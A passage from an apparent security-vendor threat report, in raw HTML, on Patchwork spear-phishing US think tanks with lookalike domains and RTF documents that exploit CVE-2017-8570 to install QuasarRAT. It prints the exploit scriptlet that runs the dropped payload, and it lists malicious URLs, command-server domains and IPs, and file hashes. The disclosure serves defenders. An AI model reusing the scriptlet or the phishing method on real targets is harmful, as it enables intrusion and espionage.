class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document.</span></td> </tr> </tbody> </table> <h5>Message 2:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr style="height: 41px;"> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; height: 41px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px; height: 41px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">Council on Foreign Relations <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="c1b6a4a3b1b3a8afb581a7b1b3a8a8efafa4b5">[email protected]</a>></td> </tr> <tr style="height: 41px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 41px;">Subject</th> <td style="padding: 6px; height: 41px;">The Four Traps China May Fall Into</td> </tr> <tr style="height: 69px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 69px;">Body</th> <td style="padding: 6px; height: 69px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following CFR article:<br /> https://www.cfr.org/blog/four-traps-china-may-fall</span></td> </tr> <tr style="height: 125px;"> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; height: 125px;">Notes</th> <td style="padding: 6px; height: 125px;"><span class="nolink"><span class="nolink">Multiple hyperlinks within the e-mail body lead to a malicious RTF document located at the URL</span></span></p> <p><span class="nolink"><span class="nolink"> <strong>hxxp://fprii.net/The_Four_Traps_for_China.doc.</strong></span></span></p> <p><span class="nolink"><span class="nolink"><strong><br /> </strong></span></span><span class="nolink">The fprii.net domain was used <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document. The structure <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> domain mimics <span class="hljs-keyword">the</span> Foreign Policy Research Institute (FPRI), whose actual domain is fpri.net.<br /> </span></td> </tr> </tbody> </table> <h5>Message 3:</h5> <table style="border: 1px solid #c6c6c6;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Headers</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">Received: by mailcenter.support</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Sender</th> <td style="padding: 6px;">Mercator Institute for China Studies <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8bfbfee9e7e2e8eaffe2e4e5f8cbe6eef9e2e8e8f8a5e4f9ec">[email protected]</a>></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Subject</th> <td style="padding: 6px;">Authoritarian advance Responding to Chinas growing political influence in Europe</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Body</th> <td style="padding: 6px;"><span class="nolink">Content and images included within the e-mail body were a direct copy of the following MERICS report:</span></p> <p><span class="nolink"> https://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;"><span class="nolink">The hyperlinked text <strong>Click here to download the report</strong> within the e-mail body lead to a malicious RTF document located at the URL</span></p> <p><span class="nolink"><strong>hxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc.<br /> </strong></span></p> <p> </p> <p>The mericcs.org domain was used <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> sender address, <span class="hljs-keyword">as</span> well <span class="hljs-keyword">as</span> <span class="hljs-keyword">the</span> hosting location <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> malicious RTF document. The structure <span class="hljs-keyword">of</span> <span class="hljs-keyword">the</span> domain mimics <span class="hljs-keyword">the</span> Mercator Institute <span class="hljs-keyword">for</span> China Studies (MERICS), whose actual domain is merics.org.</td> </tr> </tbody> </table> <h5>Sample Message</h5> <p>The image below shows an example of how the spear phishing message would look to a recipient.</p> <p><img decoding="async" class="alignnone wp-image-1096" src="https://www.volexity.com/wp-content/uploads/2018/06/4traps-email.png" alt="" width="750" height="676" srcset="https://www.volexity.com/wp-content/uploads/2018/06/4traps-email.png 950w, https://www.volexity.com/wp-content/uploads/2018/06/4traps-email-300x270.png 300w, https://www.volexity.com/wp-content/uploads/2018/06/4traps-email-768x692.png 768w" sizes="(max-width: 750px) 100vw, 750px" /></p> <h3>Exploitation and Malware Execution</h3> <p>Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. At first glance, everything might look legitimate, but in the background the target user has likely just been infected with QuasarRAT. QuasarRAT is a freely available "remote (administration|access) tool" (RAT) written in C# and distributed via Github. This RAT provides a variety of functionality that makes it particularly attractive to an attacker. This includes, but is not limited to, the following:</p> <ul> <li>AES encryption of network communication</li> <li>File management</li> <li>Functionality to download, upload, and execute files</li> <li>Keylogging</li> <li>Remote desktop access</li> <li>Remote webcam viewing</li> <li>Reverse proxy</li> <li>Browser and FTP client password recovery</li> </ul> <p>The images below are what a target user opening a malicious RTF document would see from within Microsoft Word.</p> <p><img decoding="async" class="wp-image-1077 alignleft" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1.png" alt="" width="313" height="405" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1.png 988w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-232x300.png 232w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-768x993.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_1-792x1024.png 792w" sizes="(max-width: 313px) 100vw, 313px" /><img loading="lazy" decoding="async" class="wp-image-1082 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1.png" alt="" width="310" height="403" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1.png 876w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-231x300.png 231w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-768x999.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_2-1-787x1024.png 787w" sizes="(max-width: 310px) 100vw, 310px" /></p> <p>When the malicious RTF document is opened, two things happen that allow the attacker malware to run. First, the "<a href="https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/">packager trick</a>" is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF document. Its called the "packager trick" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\Users\%username%\AppData\Local\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious "scriptlet" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial "qrat.exe" dropper from the current user's %tmp% directory.</p> <p><img loading="lazy" decoding="async" class="wp-image-1083 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4.png" alt="" width="601" height="52" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4.png 1266w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-300x26.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-768x67.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_4-1024x89.png 1024w" sizes="(max-width: 601px) 100vw, 601px" /></p> <p><em>Note: The scriptlet code is an exact match to that shown on the Github page referenced earlier for <a href="https://github.com/rxwx/CVE-2017-8570">CVE-2017-8570</a>. The string "fjzmpcjvqp" is unique and not something likely to be present if the code was not generated with the same public POC exploit code.</em></p> <blockquote><p><?XML version="1.0"?><br /> <scriptlet><br /> <registration description="fjzmpcjvqp"<br /> progid="fjzmpcjvqp"<br /> version="1.00"<br /> classid="{204774CF-D251-4F02-855B-2BE70585184B}"<br /> remotable="true" ><br /> </registration><br /> <script language="JScript"><br /> <![CDATA[<br /> <strong>var r = new ActiveXObject("WScript.Shell").Run("cmd /c %tmp%\\qrat.exe",0,false);</strong><br /> exit();<br /> ]]><br /> </script><br /> </scriptlet></p></blockquote> <p>After the initial dropper (qrat.exe) has been executed by the embedded scriptlet, it creates a directory in <strong>C:\Users\%username%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0</strong> and unpacks/drops the final QuasarRAT binary named <strong>microsoft_network.exe. </strong></p> <p><img loading="lazy" decoding="async" class="wp-image-1084 alignnone" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5.png" alt="" width="602" height="170" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5.png 1140w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-300x85.png 300w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-768x217.png 768w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_5-1024x289.png 1024w" sizes="(max-width: 602px) 100vw, 602px" /></p> <p>The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from <strong style="font-size: 1.6rem;">AirVPN</strong><span style="font-size: 1.6rem;">.</span></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-1090" src="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7.png" alt="" width="302" height="354" srcset="https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7.png 824w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7-256x300.png 256w, https://www.volexity.com/wp-content/uploads/2018/05/Patchwork_7-768x900.png 768w" sizes="(max-width: 302px) 100vw, 302px" /></p> <p>This DLL is used to create a scheduled task that points to the QuasarRAT binary, <strong>microsoft_network.exe, </strong>allowing it to remain persistent after reboot.</p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1087" src="https://www.volexity.com/wp-content/uploads/2018/06/Patchwork_8.png" alt="" width="2462" height="846" /></p> <p>As seen in the image above, the QuasarRAT scheduled task is named Microsoft_Security_Task and runs at 12:00 AM each day. Once the task is triggered, it will then repeat every 5 minutes for 60 days. When executed, <strong>microsoft_network.exe </strong>will initiate a request to <strong>freegeoip.net</strong> in order to determine the geographical location of the infected host. Immediately following the request, the malware will begin to beacon over an encrypted connection to the threat actor's command and control domain<strong> tautiaos.com (43.249.37.199)</strong>. Several related samples were identified and are included in the File Indicators section below.</p> <h3>Conclusion</h3> <p>The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. While there were a few peculiar components to some of the spear phish messages, the campaigns and themes were strategically relevant to the organizations being targeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message. This information allows a threat actor to determine if their messages were delivered, which users are more susceptible to opening them, and basic information regarding the target's operating system and e-mail client (or browser). Finally, although the payload observed being delivered by Patchwork in these campaigns is a readily available open source RAT, it does allow for flexibility in interacting with compromised machines without needing to use custom malware. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers.</p> <h3>File Indicators</h3> <h5>Samples Observed from Spear Phishing Messages Above</h5> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px;" valign="middle">Chinas_Arctic_Dream.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">6587812 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">598eeb6a18233023f3551097aa49b083</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">e9a46966f93fe15c22636a5033c61c725add8fa5</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">The_Four_Traps_for_China.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">4428595 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">7659c41a30976d523bb0fbb8cde49094</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px;" valign="middle">The_Four_Traps_for_China.doc</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">File Size</th> <td style="padding: 6px;">4428595 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">MD5</th> <td style="padding: 6px;">7659c41a30976d523bb0fbb8cde49094</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">SHA1</th> <td style="padding: 6px;">3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px;">Notes</th> <td style="padding: 6px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 89px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 707px;" valign="middle">qrat.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">File Size</th> <td style="padding: 6px; width: 707px;"><span class="s1">1093120</span> bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">MD5</th> <td style="padding: 6px; width: 707px;"><span class="s1">c05e5131b196f43e1d02ca5ccc48ec0e</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">SHA1</th> <td style="padding: 6px; width: 707px;"><span class="s1">f28c592833f234c619917b5c7d8974840a810247</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">Notes</th> <td style="padding: 6px; width: 707px;">Dropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file Microsoft.Win32.TaskScheduler.dll.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 853px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 89px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 763px;" valign="middle">microsoft_network.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">File Size</th> <td style="padding: 6px; width: 763px;"><span class="s1">846336</span> bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">MD5</th> <td style="padding: 6px; width: 763px;"><span class="s1">9e4c373003c6d8f6597f96fc3ff1f49c</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">SHA1</th> <td style="padding: 6px; width: 763px;"><span class="s1">b7319a5ccf605fb2ff7760130e212728bccad323</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 89px;">Notes</th> <td style="padding: 6px; width: 763px;">QuasarRAT file that beacons to hardcoded IP 43.249.37.199 and the domain tautiaos.com. File is dropped to</p> <p> </p> <p>C:\Users\%USERNAME%\AppData\Roaming\Microsoft Network\microsoft_network\1.0.0.0\microsoft_network.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 863px; height: 220px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; color: #505050; padding: 6px; width: 774px;" valign="middle">Microsoft.Win32.TaskScheduler.dll</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 774px;">204488 bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 774px;"><span class="s1">6fa7fce844065ce9c605cbe713f3e170</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">SHA1</th> <td style="padding: 6px; width: 774px;"><span class="s1">2f7eaad80eab3e9dcc67a003968b35c227290c69</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 774px;">.NET Task Scheduler Managed Wrapper from https://github.com/dahall/taskschedule. The DLL is also digitally signed by a certificate from "AirVPN".</td> </tr> </tbody> </table> <h5>Additional Observed Malware Files</h5> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 708px;" valign="middle"> <p class="p1"><span class="s1">Armed-Forces-Officers.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">3226435 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">89beb207e7095d237c4d25c4c6e17e97</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">SHA1</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">15010f7cea913f2a36c56da7d73c2b9eb5a3878f</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 708px;">Malicious RTF document that exploits CVE-2017-8570 and drops a Delphi RAT with the file name vsrss.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 87px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 709px;" valign="middle"> <p class="p1"><span class="s1">Part-I.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">File Size</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">11349102 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">MD5</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">92942c54224cd462dd201ae11a560bb8</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">SHA1</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">85a21624df2211af3daf05c86a3fbea8271059d3</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">Notes</th> <td style="padding: 6px; width: 709px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe. This is the same file described above.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 87px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 709px;" valign="middle"> <p class="p1"><span class="s1">Part-II.doc</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">File Size</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">10156713 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">MD5</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">e32668e569362c96cc56db368b7e821e</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">SHA1</th> <td style="padding: 6px; width: 709px;"> <p class="p1"><span class="s1">dadc493abbe3e21610539e1d5a42f523626a6132</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 87px;">Notes</th> <td style="padding: 6px; width: 709px;">Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe. Upon execution it will be installed under the filename crome.exe.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 88px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 708px;" valign="middle"> <p class="p1"><span class="s1">vsrss.exe</span></p> </th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">File Size</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">446976 </span><span style="font-family: inherit; font-size: inherit;">bytes</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">MD5</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">5c3456d5932544b779fe814133344fdb</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">SHA1</th> <td style="padding: 6px; width: 708px;"> <p class="p1"><span class="s1">7ab750afb25457a81c27a98dc6dfd51c27e61b0e</span></p> </td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 88px;">Notes</th> <td style="padding: 6px; width: 708px;">Delphi RAT file that beacons to ebeijingcn.live.</td> </tr> </tbody> </table> <table style="border: 1px solid #c6c6c6; width: 797px; height: 180px;" border="1"> <tbody> <tr> <th style="background-color: #f2f2f2; color: #505050; text-align: left; padding: 6px; width: 85px;" valign="middle">Filename</th> <th style="text-align: left; background-color: #ffffff; color: #505050; padding: 6px; width: 711px;" valign="middle"><span class="s1">mico-audio.exe, </span>crome.exe</th> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">File Size</th> <td style="padding: 6px; width: 711px;"><span class="s1">494592 </span>bytes</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">MD5</th> <td style="padding: 6px; width: 711px;"><span class="s1">2d8e9fb75e6e816cad38189691e9c9c8</span></td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">SHA1</th> <td style="padding: 6px; width: 711px;">2b9a2d5b34b4d79fdfd6c7b861311b12d1627163</td> </tr> <tr> <th style="color: #505050; background-color: #f2f2f2; text-align: left; padding: 6px; width: 85px;">Notes</th> <td style="padding: 6px; width: 711px;">QuasarRAT binary that beacons to hardcoded IP 209.58.176.201 and domain sastind-cn.org. File starts as mico-audio.exe and installs to C:\Users\%USERNAME%\AppData\Roaming\google-chrome\crome.exe.</td> </tr> </tbody> </table> <p><span style="font-size: 2.4rem; font-weight: bold;"><br /> Network Indicators</span></p> <div class="number1 alt2 line index0"> <table style="border: 1px solid #c6c6c6; width: 100%;" border="1"> <tbody> <tr> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>Hostname</strong></th> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>IP Address</strong></th> <th style="text-align: left; background-color: #f2f2f2; color: #505050; padding: 6px;" valign="middle"><strong>Notes</strong></th> </tr> <tr> <td style="padding: 6px;">mailcenter.support</td> <td style="padding: 6px;">221.121.138.139</td> <td style="padding: 6px;">Domain used to for sending spear phishes and user tracking.</td> </tr> <tr> <td style="padding: 6px;">chinapolicyanalysis.org</td> <td style="padding: 6px;">185.130.212.168</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td style="padding: 6px;">fprii.net</td> <td style="padding: 6px;">185.130.212.254</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td style="padding: 6px;"><span class="nolink">mericcs.org</span></td> <td style="padding: 6px;">221.121.138.141</td> <td style="padding: 6px;">Domain used for spear phish sender e-mail address and to host malicious documents.</td> </tr> <tr> <td style="padding: 6px;">tautiaos.com</td> <td style="padding: 6px;">43.249.37.199</td> <td style="padding: 6px;">Command and control server observed from QuasarRAT malware.</td> </tr> <tr> <td style="padding: 6px;">sastind-cn.org</td> <td style="padding: 6px;">209.58.176.201</td> <td style="padding: 6px;">Command and control server observed from QuasarRAT malware.</td> </tr> <tr> <td style="padding: 6px;">ebeijingcn.live</td> <td style="padding: 6px;">209.58.169.91</td> <td style="padding: 6px;">Command and control server observed from Delphi RAT malware.</td> </tr> </tbody> </table> <p> </p> </div> <div class="post-tags"> <a href="https://www.volexity.com/blog/tag/apt/">APT</a>, <a href="https://www.volexity.com/blog/tag/patchwork/">Patchwork</a> </div> </div> </article> <aside class="sidebar col-sm-4"> <ul class="widgets"> <li class="widget widget_search"><div class="widget-content"><form role="search" method="get" class="search-form" action="https://www.volexity.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="search-field" placeholder="SEARCH" value="" name="s" title="Search for:" /> </label> <input type="submit" class="search-submit" value="Search" /> </form></div></li> <li class="widget widget_recent_entries"><div class="widget-content"> <h4 class="widget-title">Recent Posts</h4> <ul> <li> <a href="https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/">The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access</a> </li> <li> <a href="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/">BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA</a> </li> <li> <a href="https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/">StormBamboo Compromises ISP to Abuse Insecure Software Update Mechanisms</a> </li> <li> <a href="https://www.volexity.com/blog/2024/06/13/disgomoji-malware-used-to-target-indian-government/">DISGOMOJI Malware Used to Target Indian Government</a> </li> <li> <a href="https://www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/">Detecting Compromise of CVE-2024-3400 on Palo Alto Networks GlobalProtect Devices</a> </li> </ul> </div></li><li class="widget widget_archive"><div class="widget-content"><h4 class="widget-title">Archives</h4> <ul> <li><a href='https://www.volexity.com/blog/2024/11/'>November 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/08/'>August 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/06/'>June 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/05/'>May 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/04/'>April 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/02/'>February 2024</a></li> <li><a href='https://www.volexity.com/blog/2024/01/'>January 2024</a></li> <li><a href='https://www.volexity.com/blog/2023/09/'>September 2023</a></li> <li><a href='https://www.volexity.com/blog/2023/06/'>June 2023</a></li> <li><a href='https://www.volexity.com/blog/2023/03/'>March 2023</a></li> <li><a href='https://www.volexity.com/blog/2022/12/'>December 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/08/'>August 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/07/'>July 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/06/'>June 2022</a></li> <li><a href='https://www.volexity.com/blog/2022/03/'>March 2022</a></li> <li><a 